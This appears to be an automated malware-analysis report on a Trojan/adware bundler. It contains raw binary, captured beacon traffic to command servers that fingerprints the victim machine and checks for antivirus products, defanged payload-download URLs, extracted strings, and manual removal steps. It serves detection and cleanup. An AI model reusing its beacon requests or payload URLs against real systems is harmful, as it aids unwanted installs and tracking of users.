..vN..w.w._?.?~`.......tR ^..g..... ...b..-vz.L....[.5...c..N.2.%..k.D
.v^({.......?......\8... ~...Qr....u..R$,...%N..>...t.....ryw?a....
..e.......(.x5...8...;9).........Q..6i.$.W........8s........{..j.,..i.
!.[...w.....`....&:[.;6.....Je.Wb..F.....`k..T.....<.....h.....f.j.
..`.W......n..q...,..g\t..kU....irm...,.I....y......BpsG.#.W.f..0..Bfn
6...)oG3.$.;...C.{h.........(..-..A.p..Ay..f.(..`o{ow....D......`.N..L
.y..](q.?-.....|.(J ..h....Iy......<...,U.=b..6 Ww....!.cV.2c...~.}
...f..QI. ......U.F...\E.................Zdn^.....~...I...{d{.4..H...h
.&...j..2..u....*..z...M.t..Rp....'..%b.......W...... <.[......4.88
.......r..wmPr.....0...APy......;.l..=.u....3....R......z..#$R..._...(
Ig".........e..._..*1js......v..([email protected][..0m..a.....V.&......
q.;.....xs`>.j.6..&.U.W...!L.!r.._1~...Z......HH..8....7....!...=e.
.P....g2....p...D...:B..^..$3..'[email protected])tz.by.5....{.m..]
u.I.L({.t....Az...P..|....;1...{.f...g..J.^...p......M.....'....=... .
...Q.'V...#.~.u ....YJ*(^.R...-...~......XP6..W.....gHx.]...`.5.......
7.....#..A...d.~we1.......G... ..g."-....Q....P.n.."wOAb."C.. `g...r`t
....i......q......^.>............. S.. !|..9D.6..r.}....n&-.. Y2{-K
F....[...{......... [email protected]~;...jP.....?...
.....ZQ.;......;x.x.....{  C....vq'.7LfGI..}6c........J.......<...h
5m.C.~..7)@c....8>......;.....L..%.. .).=o8....b&........-..h..
<<< skipped >>>

POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 436

Connection: Keep-Alive

key=jZKJflZ6fI2Cj34/fIeNVkk/iYuPjYZWSUp4SUp4SUt4SUl4SUk/fYVWTD96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/iIxWcWlMSz+GeoeOVmKHjX6FOVyIi4mIi3qNgoiHeHh4b2aQeot+RTlih3xHP39/Vj98gVY/gn5WT0dJR0tSSUlHTk5KSz+GenxWSUlJXEtSX11OTlpdP32Mi1aHiId+P4mAfVaHiId+P3uCfVZJP3uOgn1WSklJP4+GVks/kISNhlZKTT98e1ZKTU1KT1FPSk1P&x=1
HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:23 GMT

Server: Google Frontend

Content-Length: 43
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Cont
rol: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:2
3 GMT..Server: Google Frontend..Content-Length: 43..GIF89a............
.!.......,...........D..;..

GET /client-cmd/cr.html?type=install&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132 HTTP/1.1

Host: s3.zawss.info

Connection: Keep-Alive

HTTP/1.1 200 OK

x-amz-id-2: IDc8l YobxREKOQZRwpLsJAxlqUxwch52hitKwNL8iYdO7OiyAnHIWIoOFtAfpn1TIXHaDs39jk=

x-amz-request-id: 5CA84AF807EBB1C3

Date: Tue, 08 Sep 2015 04:22:09 GMT

Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT

ETag: "d152c08a253fe1bd8ede751d571ac800"

Accept-Ranges: bytes

Content-Type: text/html

Content-Length: 36

Server: AmazonS3
<html>..<body>..ok..</body>..</html>HTTP/1.1 2
00 OK..x-amz-id-2: IDc8l YobxREKOQZRwpLsJAxlqUxwch52hitKwNL8iYdO7OiyAn
HIWIoOFtAfpn1TIXHaDs39jk=..x-amz-request-id: 5CA84AF807EBB1C3..Date: T
ue, 08 Sep 2015 04:22:09 GMT..Last-Modified: Tue, 28 Apr 2015 16:05:06
 GMT..ETag: "d152c08a253fe1bd8ede751d571ac800"..Accept-Ranges: bytes..
Content-Type: text/html..Content-Length: 36..Server: AmazonS3..<htm
l>..<body>..ok..</body>..</html>..

POST /FCL_Co_Unq_remote_v5.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.fcesneim.us

Content-Length: 107

Connection: Keep-Alive

Cache-Control: no-cache

from=nsis&type=Reg&pubid=15690&CbId=10656&BundleVersionID=IM_240914@01&mid=qGKynuZ0mulJUhgaWZBaX8M7O6jfLzmQ
HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 04:22:25 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

Content-Length: 1870

Connection: close

Content-Type: text/html; charset=UTF-8
hXXp://VVV.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote.php..http
://VVV.stsunsetwest.com/DS_Unq_trackstats_mon.php..UA..hXXp://VVV.stsu
nsetwest.com/DS_AdvAffiliateId.php..194.242.96.218_2015-09-08_00:22:25
..NULL..12#RE2|Systweak\RegClean Pro\Version 6.1..419#O|V^0*S^0*E^0*EV
1^0*T^0,B1|C*F*I,F1|Mail.Ru\MailRuUpdater.exe,F1|Amigo\Application\ami
go.exe,RE2|Amigo,RR2|IM^330,RE3|Clients\StartMenuInternet\amigo.exe,RE
3|Microsoft\MediaPlayer\ShimInclusionList\amigo.exe,RE3|Microsoft\Wind
ows\CurrentVersion\App Paths\amigo.exe..422#D|2A^0,RE3|webssearchesSof
tware\webssearcheshp,RE3|qone8Software\qone8hp,RE3|awesomehpSoftware\a
wesomehphp,RE3|aartemisSoftware\aartemishp,RE3|sweet-pageSoftware\swee
t-pagehp,RE3|omiga-plusSoftware\omiga-plushp,RE3|vi-viewSoftware\vi-vi
ewhp,RE3|istartsurfSoftware\istartsurfhp,RE3|mystartsearchSoftware\mys
tartsearchhp,RE3|AVAST Software,RE3|AVAST,RE3|Microsoft\Windows\Curren
tVersion\Uninstall\avast..432#B1|F,RE3|SiteSee,RE3|AVAST Software,RE3|
AVAST,RE3|Microsoft\Windows\CurrentVersion\Uninstall\avast,RE3|ZoomWeb
Lists..460#RE2|InstalledBrowserExtensions\32846,RE2|ESET,RE2|Malwareby
tes' Anti-Malware,RE2|Malwarebytes,RE2|Avira,RE2|Fortinet\FortiClient,
RE2|AVG,RE3|AVAST Software,RE3|AVAST,RE3|Microsoft\Windows\CurrentVers
ion\Uninstall\avast,RE3|VIPRE Antivirus,RE3|ESET,RE3|Malwarebytes' Ant
i-Malware,RE3|Avira,RE3|KasperskyLab,RE3|Norton,RE3|Fortinet\FortiClie
nt,RE3|AVG,RE3S|Avira..575#O|V^0*S^0*E^0*EV1^0*T^0,B1|I,ER|HKLM^Softwa
re\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Softwa
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.rsrc

@.reloc

>%u0V

operator

GetProcessWindowStation

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

RegCreateKeyTransactedA

RegOpenKeyTransactedA

RegDeleteKeyTransactedA

Advapi32.dll

RegDeleteKeyExA

GetProcessHeap

KERNEL32.dll

USER32.dll

RegDeleteKeyA

RegCloseKey

RegQueryInfoKeyW

RegEnumKeyExA

RegOpenKeyExA

RegCreateKeyExA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

GetCPInfo

zcÁ

%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

7-787m7}7

6'676^6{6

:":(:2:=:

2 2$2(2,2

combase.dll

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

kernel32.dll

USER32.DLL

tae3ko.exe_1932:

.text

`.rdata

@.data

.rsrc

@.reloc

PSShE3@

GetProcessWindowStation

operator

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

GetProcessHeap

KERNEL32.dll

USER32.dll

RegCreateKeyExW

RegQueryInfoKeyW

RegDeleteKeyW

RegOpenKeyExW

RegEnumKeyExW

RegCloseKey

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

GetCPInfo

zcÁ

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

1*21272|2

3.44484<4@4

6#6,616>6

combase.dll

@mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

kernel32.dll

USER32.DLL

Advapi32.dll

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.exe

dag17797.exe_552:

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

hXXp://nsis.sf.net/NSIS_Error

... %d%%

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|<>/":

\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\nsCBHTML5.dll

hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe

ttp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\nsCBHTML5.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp

tware\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software

\Windows\CurrentVersion\Uninstall\avast

Nullsoft Install System v11-Jul-2014.cvs

GetProcessHeap

OLEAUT32.dll

WININET.dll

MSVCRT.dll

nsWeb.dll

6(7.767;7

4<.Pd

%u X`i@

_$,ZS.db

o7.6.3

0*%UP

q.ya!

nsd5.tmp

2.html?

/cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe

2~hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0

12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0

1454464

ments and Settings\"%CurrentUserName%"\Local Settings\Application Data\tmp30731\dag17797.exe"

{EEEE69B8-2C42-4825-B8E6-9597957D672B}

VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport

ft Windows XP

"%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe"

%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731

dag17797.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd4.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe

1638692

738853988

1310942

1114350

1048822

1310906

194.242.96.218_2015-09-08_00:22:25

422~hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0

ttp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0

1245428

872744016

1114338

hXXp://VVV.fcesneim.us/FCL_Co_Unq_remote_v5.php

hXXp://VVV.stsunsetwest.com/DS_Unq_trackstats_mon.php

hXXp://VVV.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote.php

\Program Files\Internet Explorer\iexplore.exe" -nohome

hXXp://VVV.stsunsetwest.com/DS_AdvAffiliateId.php

hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip

hXXp://VVV.djapp.info/?file=bundle

hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip

O|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software

576#O|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software

RE3|Opera Software

Opera

.96.218_2015-09-08_00:22:25

iliateId.php

mote.php

OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\FirstResult.txt

76#O|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software

tp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip

p_17970.exe

djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01

systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0

Default,RE2|Opera Software,RE3|Opera Software

oudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0

)-.Yln

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v11-Jul-2014.cvs</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>

hXXp://VVV.microsoft.com

dag17797.exe_552_rwx_10004000_00001000:

callback%d

taedko.exe_1604:

.text

`.rdata

@.data

.rsrc

@.reloc

[email protected]

>%u0V

j.Yf;

_tcPVj@

.PjRW

M%D,3

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

operator

GetProcessWindowStation

n%D,3

%s\data

%s%s.js

jquery4toolbar.js

content/jquery4toolbar.js

TrayIcons/logo.ico

logo.ico

In CallJS -> %s

In CallJS.Invoke -> 0xX

in DispInvoke: Searching -> %s

atiexecute

-exe "%s"

..\GetStylesUpdater.exe

%s%s.exe

chrome.exe

%s --new-window --app-window-size=%d,%d --app="%s"

cmd /C %s

http\shell\open\command

chrome

firefox

opera

%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s

%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s

%s%s%s%s%s%s%s%s%s%s%s

%s%s%s%s%s%s%s%s%s%s

%sTrayIcons\

%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s

%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s

%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s

%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s

close://close.it/

%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s

Chrome_WidgetWin_1

MozillaWindowClass

%s%s%s%s%s%s%s%s%s%s%s%s%s%s

hXXp://

%s%s%s%s%s%s%s%s%s%s%s%s

\\.\pipe\61FDC17A-A7B6-4BEB-9B8E-1709DF12376C

%s%s.dat

advapi32.dll

RegDeleteKeyA

%sLow

RegDeleteKeyExA

%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s

%s%s%s%s%s%s%s%s

%s%s%s%s

%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

RegCreateKeyTransactedA

RegOpenKeyTransactedA

RegDeleteKeyTransactedA

Advapi32.dll

GetProcessHeap

CreateIoCompletionPort

CreateNamedPipeA

ConnectNamedPipe

DisconnectNamedPipe

KERNEL32.dll

EnumWindows

USER32.dll

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegEnumKeyExA

RegCreateKeyExA

RegOpenKeyW

RegQueryInfoKeyW

RegOpenKeyA

RegEnumKeyExW

ADVAPI32.dll

SHELL32.dll

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

DeleteUrlCacheEntry

WININET.dll

URLDownloadToCacheFileA

urlmon.dll

gdiplus.dll

OLEACC.dll

GetCPInfo

zcÁ

%Documents and Settings%\All Users\Application Data\IlejwTivc\taedko.exe

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

9!919;9_9

283F3a3~3

4'454-8@8

4'444=4{:

combase.dll

mscoree.dll

kernel32.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

USER32.DLL

portuguese-brazilian

update.exe

%s\Volatile Environment

.default

S-%d-%x-%lu-%lu-%lu-%lu-%lu-%lu-%lu-%lu

{8856F961-340A-11D0-A96B-00C04FD705A2}

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:924
   taeako.exe:900
   taeako.exe:2352
   taeako.exe:212
   taeako.exe:972
   taeako.exe:948
   taeako.exe:2980
   taeako.exe:2644
   taeako.exe:1536
   taeako.exe:544
   taeako.exe:436
   taedko.exe:1988
   

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.dll (39329 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (11 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\UserInfo.dll (4 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\utaujte.js (1447 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\StdUtils.dll (14 bytes)
   %Documents and Settings%\All Users\Application Data\IlejwTivc\Uninstaller.exe (8560 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (101002 bytes)
   %Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (902 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\adblocker_installer__1441686123.txt (16441 bytes)
   %Documents and Settings%\All Users\Application Data\IlejwTivc\logo.ico (784 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\tmp.bpu (10136 bytes)
   %Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.exe (3616 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\jquery4toolbar.js (3312 bytes)
   %Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.dll (20416 bytes)
   %Documents and Settings%\All Users\Application Data\IlejwTivc\taedko.exe (13368 bytes)
   %Documents and Settings%\All Users\Application Data\IlejwTivc\tae3kod.dll (20416 bytes)
   %Documents and Settings%\All Users\Application Data\IlejwTivc\content\khkiaff.js (1856 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\TrayIcons\logo.ico (784 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsislog.dll (1552 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\CavnNotn.dll (4992 bytes)
   %Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (569 bytes)
   %Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.exe (4992 bytes)
   %Documents and Settings%\All Users\Application Data\IlejwTivc\tae6kod.dll (39329 bytes)
   %Documents and Settings%\All Users\Application Data\IlejwTivc\utils.exe (9527 bytes)
   %Documents and Settings%\All Users\Application Data\IlejwTivc\content\narhokgeb.js (6 bytes)
   %Documents and Settings%\All Users\Application Data\IlejwTivc\taewko.exe (4992 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsisos.dll (5 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\narhokgeb.js (6 bytes)
   %Documents and Settings%\All Users\Application Data\IlejwTivc\taeadko.bnp (14184 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\khkiaff.js (1856 bytes)
   %Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe (4992 bytes)
   %Documents and Settings%\All Users\Application Data\IlejwTivc\content\utaujte.js (1447 bytes)
   %Documents and Settings%\All Users\Application Data\IlejwTivc\taewdko.bnp (6584 bytes)
   %Documents and Settings%\All Users\Application Data\IlejwTivc\content\jquery4toolbar.js (3312 bytes)
   %WinDir%\Tasks\Tempo Runner tae3ko.job (1352 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe (1509 bytes)
   %WinDir%\Tasks\Tempo Runner tae6ko.job (8112 bytes)
   %WinDir%\Tasks\Tempo Runner taedko.job (2704 bytes)
   %WinDir%\Tasks\Tempo adblocker Runner.job (920 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\lgv[1].js (122 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f (392 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_gb (32 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_expire (13 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_gb (32 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cmp_ext[1].js (8 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\obbgint[1].js (4 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_gb (32 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58 (196 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ammbg[1].js (137 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_gb (32 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_expire (13 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b (137 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_expire (13 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_expire (13 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_expire (13 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cxeappconf[1].js (482 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\getcc[1].php (2 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\v1[1].htm (161 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ammapp[1].js (3 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_expire (13 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_gb (32 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_gb (32 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92 (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_gb (32 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\loader[1].js (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_expire (13 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer2.zip (392 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\inner.png (146 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\blowfish.dll (22 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_12.html (1681 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Math.dll (2489 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer1.zip (7 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\FirstResult.txt (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\registry.dll (25 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\SecondResult.txt (611 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsCBHTML5.dll (1660 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsisunz.dll (211 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\serlib.dll (16 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\img12_1.jpg (145 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DSS_Unq_IMapplication_mon_remote[1].htm (611 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\UserInfo.dll (4 bytes)
